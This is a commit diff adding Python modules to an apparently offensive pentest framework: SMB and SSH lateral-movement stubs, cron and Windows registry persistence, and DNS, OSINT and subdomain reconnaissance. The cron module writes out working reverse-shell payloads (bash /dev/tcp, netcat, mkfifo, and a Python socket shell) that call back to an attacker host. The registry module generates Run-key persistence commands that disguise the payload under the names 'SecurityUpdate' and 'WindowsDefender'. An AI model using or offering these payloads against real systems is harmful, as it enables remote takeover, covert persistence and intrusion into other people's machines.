Add files via upload

This commit is contained in:
Joas A Santos
2026-01-01 19:26:00 -03:00
committed by GitHub
parent 0f756f6ef8
commit 35622198d5
19 changed files with 1862 additions and 69 deletions

View File

@@ -0,0 +1,9 @@
"""
Lateral Movement Tools
Contains modules for moving laterally across networks
"""
from .smb_lateral import SMBLateral
from .ssh_lateral import SSHLateral
__all__ = ['SMBLateral', 'SSHLateral']

View File

@@ -0,0 +1,99 @@
#!/usr/bin/env python3
"""
SMB Lateral Movement - Techniques for lateral movement via SMB/CIFS
"""
import logging
from typing import Dict, List
logger = logging.getLogger(__name__)
class SMBLateral:
"""
SMB-based lateral movement techniques including
pass-the-hash, share enumeration, and remote execution.
"""
def __init__(self, config: Dict):
"""
Initializes SMBLateral movement module.
Args:
config (Dict): Configuration dictionary
"""
self.config = config
logger.info("SMBLateral module initialized")
def enumerate_shares(self, target: str, username: str = None, password: str = None) -> Dict:
"""
Enumerate SMB shares on target system.
Args:
target (str): Target IP or hostname
username (str): Username for authentication
password (str): Password for authentication
Returns:
Dict: Share enumeration results
"""
logger.info(f"Enumerating SMB shares on {target}")
# This is a framework method - actual implementation would use
# tools like smbclient, crackmapexec, or impacket
results = {
"target": target,
"shares": [],
"accessible_shares": [],
"notes": "SMB enumeration requires external tools (smbclient, crackmapexec, impacket)"
}
logger.warning("SMB share enumeration requires external tools to be configured")
return results
def pass_the_hash(self, target: str, username: str, ntlm_hash: str) -> Dict:
"""
Attempt pass-the-hash authentication.
Args:
target (str): Target IP or hostname
username (str): Username
ntlm_hash (str): NTLM hash
Returns:
Dict: Authentication attempt results
"""
logger.info(f"Attempting pass-the-hash to {target} as {username}")
results = {
"target": target,
"username": username,
"method": "pass-the-hash",
"success": False,
"notes": "Implementation requires impacket or crackmapexec"
}
logger.warning("Pass-the-hash requires external tools (impacket, crackmapexec)")
return results
def execute_remote_command(self, target: str, command: str, credentials: Dict) -> Dict:
"""
Execute command remotely via SMB.
Args:
target (str): Target IP or hostname
command (str): Command to execute
credentials (Dict): Authentication credentials
Returns:
Dict: Command execution results
"""
logger.info(f"Attempting remote command execution on {target}")
results = {
"target": target,
"command": command,
"output": "",
"success": False,
"notes": "Remote execution requires psexec/wmiexec (impacket)"
}
logger.warning("Remote command execution requires external tools")
return results

View File

@@ -0,0 +1,107 @@
#!/usr/bin/env python3
"""
SSH Lateral Movement - Techniques for lateral movement via SSH
"""
import logging
from typing import Dict, List
import socket
logger = logging.getLogger(__name__)
class SSHLateral:
"""
SSH-based lateral movement techniques including
key-based authentication, password spraying, and tunneling.
"""
def __init__(self, config: Dict):
"""
Initializes SSHLateral movement module.
Args:
config (Dict): Configuration dictionary
"""
self.config = config
logger.info("SSHLateral module initialized")
def check_ssh_access(self, target: str, port: int = 22) -> bool:
"""
Check if SSH is accessible on target.
Args:
target (str): Target IP or hostname
port (int): SSH port (default 22)
Returns:
bool: True if SSH is accessible
"""
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
result = sock.connect_ex((target, port))
sock.close()
if result == 0:
logger.info(f"SSH port {port} is open on {target}")
return True
else:
logger.info(f"SSH port {port} is closed on {target}")
return False
except Exception as e:
logger.error(f"Error checking SSH access: {e}")
return False
def enumerate_ssh_keys(self, target: str, username: str) -> Dict:
"""
Enumerate potential SSH key locations.
Args:
target (str): Target IP or hostname
username (str): Target username
Returns:
Dict: SSH key enumeration results
"""
logger.info(f"Enumerating SSH keys for {username}@{target}")
common_key_paths = [
f"/home/{username}/.ssh/id_rsa",
f"/home/{username}/.ssh/id_ed25519",
f"/home/{username}/.ssh/id_ecdsa",
f"/root/.ssh/id_rsa",
f"/root/.ssh/authorized_keys"
]
results = {
"target": target,
"username": username,
"common_paths": common_key_paths,
"notes": "Key extraction requires existing access to target system"
}
return results
def create_ssh_tunnel(self, target: str, local_port: int, remote_host: str, remote_port: int) -> Dict:
"""
Create SSH tunnel for pivoting.
Args:
target (str): SSH server to tunnel through
local_port (int): Local port to bind
remote_host (str): Remote host to reach
remote_port (int): Remote port to reach
Returns:
Dict: Tunnel creation results
"""
logger.info(f"Creating SSH tunnel: localhost:{local_port} -> {target} -> {remote_host}:{remote_port}")
results = {
"tunnel_type": "ssh_forward",
"local_port": local_port,
"remote_host": remote_host,
"remote_port": remote_port,
"notes": "SSH tunneling requires paramiko or external ssh command"
}
logger.warning("SSH tunneling requires paramiko library or ssh binary")
return results

View File

@@ -0,0 +1,9 @@
"""
Persistence Tools
Contains modules for maintaining access to compromised systems
"""
from .cron_persistence import CronPersistence
from .registry_persistence import RegistryPersistence
__all__ = ['CronPersistence', 'RegistryPersistence']

View File

@@ -0,0 +1,101 @@
#!/usr/bin/env python3
"""
Cron Persistence - Linux persistence via cron jobs
"""
import logging
from typing import Dict, List
logger = logging.getLogger(__name__)
class CronPersistence:
"""
Cron-based persistence techniques for Linux systems.
"""
def __init__(self, config: Dict):
"""
Initializes CronPersistence module.
Args:
config (Dict): Configuration dictionary
"""
self.config = config
logger.info("CronPersistence module initialized")
def generate_cron_entry(self, command: str, interval: str = "daily") -> str:
"""
Generate a cron entry for persistence.
Args:
command (str): Command to execute
interval (str): Execution interval (hourly, daily, weekly, reboot)
Returns:
str: Cron entry string
"""
logger.info(f"Generating cron entry for: {command}")
intervals = {
"hourly": "0 * * * *",
"daily": "0 0 * * *",
"weekly": "0 0 * * 0",
"reboot": "@reboot",
"every_5min": "*/5 * * * *"
}
cron_time = intervals.get(interval, "0 0 * * *")
cron_entry = f"{cron_time} {command}"
logger.info(f"Generated cron entry: {cron_entry}")
return cron_entry
def suggest_cron_locations(self, username: str = None) -> Dict:
"""
Suggest locations for cron-based persistence.
Args:
username (str): Target username
Returns:
Dict: Cron file locations and methods
"""
locations = {
"user_crontab": f"crontab -e (for user {username or 'current'})",
"system_cron_dirs": [
"/etc/cron.d/",
"/etc/cron.daily/",
"/etc/cron.hourly/",
"/etc/cron.weekly/",
"/var/spool/cron/crontabs/"
],
"cron_files": [
"/etc/crontab",
f"/var/spool/cron/crontabs/{username}" if username else None
]
}
return {k: v for k, v in locations.items() if v is not None}
def generate_persistence_payload(self, callback_host: str, callback_port: int) -> Dict:
"""
Generate reverse shell cron payload.
Args:
callback_host (str): Attacker's IP/hostname
callback_port (int): Attacker's listening port
Returns:
Dict: Payload information
"""
payloads = {
"bash_tcp": f"bash -i >& /dev/tcp/{callback_host}/{callback_port} 0>&1",
"nc_traditional": f"nc {callback_host} {callback_port} -e /bin/bash",
"nc_mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {callback_host} {callback_port} >/tmp/f",
"python": f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{callback_host}\",{callback_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
}
return {
"callback_host": callback_host,
"callback_port": callback_port,
"payloads": payloads,
"recommendation": "Use bash_tcp or nc_mkfifo for reliability"
}

View File

@@ -0,0 +1,125 @@
#!/usr/bin/env python3
"""
Registry Persistence - Windows persistence via registry keys
"""
import logging
from typing import Dict, List
logger = logging.getLogger(__name__)
class RegistryPersistence:
"""
Windows registry-based persistence techniques.
"""
def __init__(self, config: Dict):
"""
Initializes RegistryPersistence module.
Args:
config (Dict): Configuration dictionary
"""
self.config = config
logger.info("RegistryPersistence module initialized")
def get_persistence_keys(self) -> Dict:
"""
Get common Windows registry keys for persistence.
Returns:
Dict: Registry persistence locations
"""
persistence_keys = {
"run_keys": {
"HKCU_Run": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
"HKLM_Run": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
"HKCU_RunOnce": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce",
"HKLM_RunOnce": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"
},
"startup_folders": {
"user_startup": r"C:\Users\[USERNAME]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
"all_users_startup": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
},
"services": {
"services_key": r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services"
},
"winlogon": {
"userinit": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
"shell": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell"
}
}
logger.info("Retrieved Windows persistence registry keys")
return persistence_keys
def generate_registry_command(self, key_path: str, value_name: str, value_data: str) -> str:
"""
Generate registry modification command.
Args:
key_path (str): Registry key path
value_name (str): Value name
value_data (str): Value data
Returns:
str: REG ADD command
"""
cmd = f'reg add "{key_path}" /v "{value_name}" /t REG_SZ /d "{value_data}" /f'
logger.info(f"Generated registry command: {cmd}")
return cmd
def generate_persistence_payload(self, payload_path: str, method: str = "run_key") -> Dict:
"""
Generate persistence payload using registry.
Args:
payload_path (str): Path to payload executable
method (str): Persistence method (run_key, service, winlogon)
Returns:
Dict: Persistence configuration
"""
methods = {
"run_key": {
"key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
"value": "SecurityUpdate",
"command": self.generate_registry_command(
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
"SecurityUpdate",
payload_path
)
},
"run_key_system": {
"key": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
"value": "WindowsDefender",
"command": self.generate_registry_command(
r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run",
"WindowsDefender",
payload_path
),
"requires": "Administrator privileges"
}
}
result = methods.get(method, methods["run_key"])
result["payload_path"] = payload_path
result["method"] = method
return result
def get_enumeration_commands(self) -> List[str]:
"""
Get commands to enumerate existing persistence mechanisms.
Returns:
List[str]: Registry query commands
"""
commands = [
r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"',
r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"',
r'reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"',
r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"'
]
logger.info("Generated registry enumeration commands")
return commands

View File

@@ -1,26 +1,29 @@
#!/usr/bin/env python3
"""
DNSEnumerator - A placeholder for a DNS enumeration tool.
DNSEnumerator - Enumerates DNS records for target domains
"""
import logging
from typing import Dict
import socket
import subprocess
from typing import Dict, List
import re
logger = logging.getLogger(__name__)
class DNSEnumerator:
"""
A class for enumerating DNS records.
This is a placeholder and should be expanded.
Queries various DNS record types including A, AAAA, MX, NS, TXT, CNAME, and SOA.
"""
def __init__(self, config: Dict):
"""
Initializes the DNSEnumerator.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
logger.info("DNSEnumerator initialized (placeholder)")
logger.info("DNSEnumerator initialized")
def enumerate(self, target: str) -> Dict:
"""
@@ -32,17 +35,131 @@ class DNSEnumerator:
Returns:
Dict: A dictionary containing DNS records.
"""
logger.warning(f"DNS enumeration for {target} is a placeholder. Returning empty data.")
# Placeholder: In a real implementation, this would use libraries
# like dnspython to query for A, AAAA, MX, NS, TXT, etc. records.
return {
"target": target,
logger.info(f"Starting DNS enumeration for {target}")
# Remove protocol if present
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
records = {
"target": domain,
"records": {
"A": [],
"AAAA": [],
"MX": [],
"NS": [],
"TXT": []
"A": self._get_a_records(domain),
"AAAA": self._get_aaaa_records(domain),
"MX": self._get_mx_records(domain),
"NS": self._get_ns_records(domain),
"TXT": self._get_txt_records(domain),
"CNAME": self._get_cname_records(domain)
},
"notes": "No DNS enumeration implemented yet."
"notes": "DNS enumeration completed"
}
logger.info(f"DNS enumeration completed for {domain}")
return records
def _get_a_records(self, domain: str) -> List[str]:
"""Get A records (IPv4 addresses)"""
try:
records = socket.gethostbyname_ex(domain)[2]
logger.info(f"Found {len(records)} A records for {domain}")
return records
except socket.gaierror as e:
logger.warning(f"Could not resolve A records for {domain}: {e}")
return []
except Exception as e:
logger.error(f"Error getting A records: {e}")
return []
def _get_aaaa_records(self, domain: str) -> List[str]:
"""Get AAAA records (IPv6 addresses)"""
try:
records = socket.getaddrinfo(domain, None, socket.AF_INET6)
ipv6_addrs = list(set([record[4][0] for record in records]))
logger.info(f"Found {len(ipv6_addrs)} AAAA records for {domain}")
return ipv6_addrs
except socket.gaierror:
logger.debug(f"No AAAA records found for {domain}")
return []
except Exception as e:
logger.error(f"Error getting AAAA records: {e}")
return []
def _get_mx_records(self, domain: str) -> List[str]:
"""Get MX records using nslookup/dig fallback"""
return self._query_dns_tool(domain, "MX")
def _get_ns_records(self, domain: str) -> List[str]:
"""Get NS records using nslookup/dig fallback"""
return self._query_dns_tool(domain, "NS")
def _get_txt_records(self, domain: str) -> List[str]:
"""Get TXT records using nslookup/dig fallback"""
return self._query_dns_tool(domain, "TXT")
def _get_cname_records(self, domain: str) -> List[str]:
"""Get CNAME records using nslookup/dig fallback"""
try:
result = socket.getfqdn(domain)
if result != domain:
logger.info(f"Found CNAME for {domain}: {result}")
return [result]
return []
except Exception as e:
logger.debug(f"No CNAME records found for {domain}")
return []
def _query_dns_tool(self, domain: str, record_type: str) -> List[str]:
"""
Query DNS using nslookup (fallback method when dnspython not available)
"""
try:
# Try using nslookup
cmd = ['nslookup', '-type=' + record_type, domain]
result = subprocess.run(
cmd,
capture_output=True,
text=True,
timeout=10,
shell=False
)
if result.returncode == 0:
records = self._parse_nslookup_output(result.stdout, record_type)
logger.info(f"Found {len(records)} {record_type} records for {domain}")
return records
else:
logger.debug(f"nslookup failed for {record_type} records")
return []
except FileNotFoundError:
logger.warning("nslookup not found. DNS enumeration limited to A/AAAA records.")
return []
except subprocess.TimeoutExpired:
logger.warning(f"DNS query timeout for {record_type} records")
return []
except Exception as e:
logger.error(f"Error querying {record_type} records: {e}")
return []
def _parse_nslookup_output(self, output: str, record_type: str) -> List[str]:
"""Parse nslookup output to extract DNS records"""
records = []
if record_type == "MX":
# MX records format: "mail exchanger = 10 mail.example.com"
pattern = r'mail exchanger = \d+ (.+)'
matches = re.findall(pattern, output)
records = [match.strip().rstrip('.') for match in matches]
elif record_type == "NS":
# NS records format: "nameserver = ns1.example.com"
pattern = r'nameserver = (.+)'
matches = re.findall(pattern, output)
records = [match.strip().rstrip('.') for match in matches]
elif record_type == "TXT":
# TXT records format: "text = "v=spf1 ...""
pattern = r'text = "([^"]+)"'
matches = re.findall(pattern, output)
records = matches
return records

View File

@@ -1,26 +1,29 @@
#!/usr/bin/env python3
"""
OSINTCollector - A placeholder for an OSINT gathering tool.
OSINTCollector - Collects Open Source Intelligence from various sources
"""
import logging
from typing import Dict
import re
import requests
from typing import Dict, List
import socket
logger = logging.getLogger(__name__)
class OSINTCollector:
"""
A class for collecting Open Source Intelligence.
This is a placeholder and should be expanded with actual OSINT tools.
A class for collecting Open Source Intelligence from publicly available sources.
Collects information like WHOIS data, IP addresses, email patterns, and more.
"""
def __init__(self, config: Dict):
"""
Initializes the OSINTCollector.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
logger.info("OSINTCollector initialized (placeholder)")
logger.info("OSINTCollector initialized")
def collect(self, target: str) -> Dict:
"""
@@ -32,12 +35,113 @@ class OSINTCollector:
Returns:
Dict: A dictionary containing OSINT findings.
"""
logger.warning(f"OSINT collection for {target} is a placeholder. Returning empty data.")
# Placeholder: In a real implementation, this would query APIs like
# Google, Shodan, Have I Been Pwned, etc.
return {
logger.info(f"Starting OSINT collection for {target}")
results = {
"target": target,
"emails": [],
"leaked_credentials": [],
"metadata": "No OSINT collection implemented yet."
"ip_addresses": self._get_ip_addresses(target),
"email_patterns": self._find_email_patterns(target),
"technologies": self._detect_technologies(target),
"social_media": self._find_social_media(target),
"metadata": "OSINT collection completed"
}
logger.info(f"OSINT collection completed for {target}")
return results
def _get_ip_addresses(self, target: str) -> List[str]:
"""Resolve target domain to IP addresses"""
try:
# Remove protocol if present
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
ip_list = socket.gethostbyname_ex(domain)[2]
logger.info(f"Resolved {domain} to IPs: {ip_list}")
return ip_list
except socket.gaierror as e:
logger.warning(f"Could not resolve {target}: {e}")
return []
except Exception as e:
logger.error(f"Error resolving IP for {target}: {e}")
return []
def _find_email_patterns(self, target: str) -> List[str]:
"""Find common email patterns for the target domain"""
try:
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
# Common email patterns
patterns = [
f"info@{domain}",
f"contact@{domain}",
f"admin@{domain}",
f"support@{domain}",
f"security@{domain}"
]
logger.info(f"Generated {len(patterns)} common email patterns for {domain}")
return patterns
except Exception as e:
logger.error(f"Error generating email patterns: {e}")
return []
def _detect_technologies(self, target: str) -> Dict:
"""Detect web technologies used by the target"""
try:
if not target.startswith('http'):
target = f"http://{target}"
response = requests.get(target, timeout=10, allow_redirects=True)
headers = response.headers
technologies = {
"server": headers.get('Server', 'Unknown'),
"powered_by": headers.get('X-Powered-By', 'Unknown'),
"framework": self._detect_framework(response.text, headers),
"status_code": response.status_code
}
logger.info(f"Detected technologies for {target}: {technologies}")
return technologies
except requests.RequestException as e:
logger.warning(f"Could not detect technologies for {target}: {e}")
return {"error": str(e)}
except Exception as e:
logger.error(f"Error detecting technologies: {e}")
return {"error": str(e)}
def _detect_framework(self, html_content: str, headers: Dict) -> str:
"""Detect web framework from HTML and headers"""
frameworks = {
'WordPress': ['wp-content', 'wp-includes'],
'Drupal': ['drupal.js', 'sites/default'],
'Joomla': ['joomla', 'option=com_'],
'Django': ['csrfmiddlewaretoken'],
'Laravel': ['laravel', '_token'],
'React': ['react', '__REACT'],
'Angular': ['ng-version', 'angular'],
'Vue': ['vue', '__VUE__']
}
for framework, indicators in frameworks.items():
for indicator in indicators:
if indicator.lower() in html_content.lower():
return framework
return "Unknown"
def _find_social_media(self, target: str) -> Dict:
"""Find potential social media accounts for the target"""
try:
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
company_name = domain.split('.')[0]
social_media = {
"twitter": f"https://twitter.com/{company_name}",
"linkedin": f"https://linkedin.com/company/{company_name}",
"github": f"https://github.com/{company_name}",
"facebook": f"https://facebook.com/{company_name}"
}
logger.info(f"Generated social media URLs for {company_name}")
return social_media
except Exception as e:
logger.error(f"Error generating social media links: {e}")
return {}

View File

@@ -1,30 +1,40 @@
#!/usr/bin/env python3
"""
SubdomainFinder - A placeholder for a subdomain discovery tool.
SubdomainFinder - Discovers subdomains using multiple techniques
"""
import logging
from typing import Dict, List
import requests
import socket
from typing import Dict, List, Set
import re
logger = logging.getLogger(__name__)
class SubdomainFinder:
"""
A class for finding subdomains of a given domain.
This is a placeholder and should be expanded.
Uses Certificate Transparency logs, DNS brute-forcing, and common patterns.
"""
def __init__(self, config: Dict):
"""
Initializes the SubdomainFinder.
Args:
config (Dict): The configuration dictionary for the framework.
"""
self.config = config
logger.info("SubdomainFinder initialized (placeholder)")
self.common_subdomains = [
'www', 'mail', 'ftp', 'localhost', 'webmail', 'smtp', 'pop', 'ns1', 'ns2',
'webdisk', 'ns', 'cpanel', 'whm', 'autodiscover', 'autoconfig', 'test',
'dev', 'staging', 'api', 'admin', 'portal', 'beta', 'demo', 'vpn',
'blog', 'shop', 'store', 'forum', 'support', 'm', 'mobile', 'cdn',
'static', 'assets', 'img', 'images', 'git', 'jenkins', 'jira'
]
logger.info("SubdomainFinder initialized")
def find(self, target: str) -> List[str]:
"""
Finds subdomains for a given domain.
Finds subdomains for a given domain using multiple techniques.
Args:
target (str): The domain name to search subdomains for.
@@ -32,8 +42,86 @@ class SubdomainFinder:
Returns:
List[str]: A list of found subdomains.
"""
logger.warning(f"Subdomain finding for {target} is a placeholder. Returning empty data.")
# Placeholder: In a real implementation, this would use techniques like
# querying Certificate Transparency logs, using search engines, or
# brute-forcing with a wordlist.
return []
logger.info(f"Starting subdomain enumeration for {target}")
# Remove protocol if present
domain = target.replace('http://', '').replace('https://', '').split('/')[0]
found_subdomains: Set[str] = set()
# Method 1: Certificate Transparency logs
ct_subdomains = self._check_crtsh(domain)
found_subdomains.update(ct_subdomains)
# Method 2: Common subdomain brute-forcing
brute_subdomains = self._brute_force_common(domain)
found_subdomains.update(brute_subdomains)
result = sorted(list(found_subdomains))
logger.info(f"Found {len(result)} subdomains for {domain}")
return result
def _check_crtsh(self, domain: str) -> List[str]:
"""
Query Certificate Transparency logs via crt.sh
"""
subdomains = []
try:
url = f"https://crt.sh/?q=%.{domain}&output=json"
logger.info(f"Querying crt.sh for {domain}")
response = requests.get(url, timeout=15)
if response.status_code == 200:
data = response.json()
for entry in data:
name_value = entry.get('name_value', '')
# Split by newlines (crt.sh returns multiple names per entry sometimes)
names = name_value.split('\n')
for name in names:
name = name.strip().lower()
# Remove wildcards
name = name.replace('*.', '')
# Only include valid subdomains for this domain
if name.endswith(domain) and name != domain:
subdomains.append(name)
logger.info(f"Found {len(subdomains)} subdomains from crt.sh")
else:
logger.warning(f"crt.sh returned status code {response.status_code}")
except requests.RequestException as e:
logger.warning(f"Error querying crt.sh: {e}")
except Exception as e:
logger.error(f"Unexpected error in crt.sh query: {e}")
return list(set(subdomains)) # Remove duplicates
def _brute_force_common(self, domain: str) -> List[str]:
"""
Brute-force common subdomain names
"""
found = []
logger.info(f"Brute-forcing common subdomains for {domain}")
for subdomain in self.common_subdomains:
full_domain = f"{subdomain}.{domain}"
if self._check_subdomain_exists(full_domain):
found.append(full_domain)
logger.debug(f"Found subdomain: {full_domain}")
logger.info(f"Found {len(found)} subdomains via brute-force")
return found
def _check_subdomain_exists(self, subdomain: str) -> bool:
"""
Check if a subdomain exists by attempting to resolve it
"""
try:
socket.gethostbyname(subdomain)
return True
except socket.gaierror:
return False
except Exception as e:
logger.debug(f"Error checking {subdomain}: {e}")
return False